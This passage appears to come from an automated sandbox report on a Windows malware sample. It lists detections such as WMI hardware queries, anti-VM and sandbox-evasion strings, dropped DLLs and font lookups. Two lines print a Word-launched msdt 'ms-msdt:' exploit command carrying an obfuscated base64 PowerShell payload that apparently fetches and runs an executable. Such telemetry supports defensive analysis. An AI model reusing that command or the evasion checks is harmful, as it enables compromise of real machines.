                Source: Yara matchFile source: 0000000F.00000002.552178062.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PROMZwFp385vXrN.exe PID: 5444, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: PMoZbw.exe PID: 3300, type: MEMORYSTR
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.552178062.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.552178062.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe TID: 5456Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 779
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.dllJump to dropped file
                Source: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exeMemory allocated: 11D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exeMemory allocated: 2EE0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeThread delayed: delay time: 922337203685477
                Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000002.584636580.0000000004045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMU?
                Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_06D36AC8 LdrInitializeThunk,
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeMemory written: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe base: 400000 value starts with: 4D5A
                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/xcQxBNKQ91ktbrVpBN.csReference to suspicious API methods: ('QENv8bZXKE', 'GetProcAddress@kernel32'), ('G9Rvbd0JQm', 'LoadLibrary@kernel32')
                Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, A/C1.csReference to suspicious API methods: ('A', 'VirtualAllocExNuma@kernel32.dll')
                Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, A/e2.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe c:\windows\system32\msdt.exe" ms-msdt:/id pcwdiagnostic /skip force /param "it_rebrowseforfile=#6aw it_launchmethod=contextmenu it_browseforfile=4n0$(iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'u1rpcc1wum9jrvntic1gt1jdzsattkftzsanbxnkdcc7jdggpsbbzgqtdflqzsattuvtqkvyzevgsu5pdglptianw0rsbeltcg9ydcgivxjmtw9ulmrsbcisienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigskcsc3ryaw5nifvxysxzdhjpbmcgcfksdwludcblyyxjbnrqdhigcnepoycglu5bbuugilfdiiatbmfnrvnwyunfigd1ic1qyxnzvghydtsgjdg6olvstervd25sb2fkvg9gawxlkdasimh0dhbzoi8vchpzcmjsb2cuy29tl3dwlwnvbnrlbnqvdxbsb2fkcy8ymdeyl1bst01ad0zwmzg1dlhyti5leguilcikrw5wokfquerbvefcufjptvp3rnazodv2whjolmv4zsismcwwktttdgfsvc1zbevlccgzkttjbnzpa0utsvrlbsaijgvudjpbufbeqvrbxfbst01ad0zwmzg1dlhyti5leguio3n0t3atufjpy2vtuyatzk9sy0uglw5hbwugj3nkawfnbmhvc3qn'+[char]0x22+'))'))))m3/../../../../../../../../../../../../../../../../.exe
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe c:\windows\system32\msdt.exe" ms-msdt:/id pcwdiagnostic /skip force /param "it_rebrowseforfile=#6aw it_launchmethod=contextmenu it_browseforfile=4n0$(iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'u1rpcc1wum9jrvntic1gt1jdzsattkftzsanbxnkdcc7jdggpsbbzgqtdflqzsattuvtqkvyzevgsu5pdglptianw0rsbeltcg9ydcgivxjmtw9ulmrsbcisienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigskcsc3ryaw5nifvxysxzdhjpbmcgcfksdwludcblyyxjbnrqdhigcnepoycglu5bbuugilfdiiatbmfnrvnwyunfigd1ic1qyxnzvghydtsgjdg6olvstervd25sb2fkvg9gawxlkdasimh0dhbzoi8vchpzcmjsb2cuy29tl3dwlwnvbnrlbnqvdxbsb2fkcy8ymdeyl1bst01ad0zwmzg1dlhyti5leguilcikrw5wokfquerbvefcufjptvp3rnazodv2whjolmv4zsismcwwktttdgfsvc1zbevlccgzkttjbnzpa0utsvrlbsaijgvudjpbufbeqvrbxfbst01ad0zwmzg1dlhyti5leguio3n0t3atufjpy2vtuyatzk9sy0uglw5hbwugj3nkawfnbmhvc3qn'+[char]0x22+'))'))))m3/../../../../../../../../../../../../../../../../.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBFF.tmp" "c:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC7C7.tmp" "c:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE5AF.tmp" "c:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP"
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess created: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe {path}
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
                Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
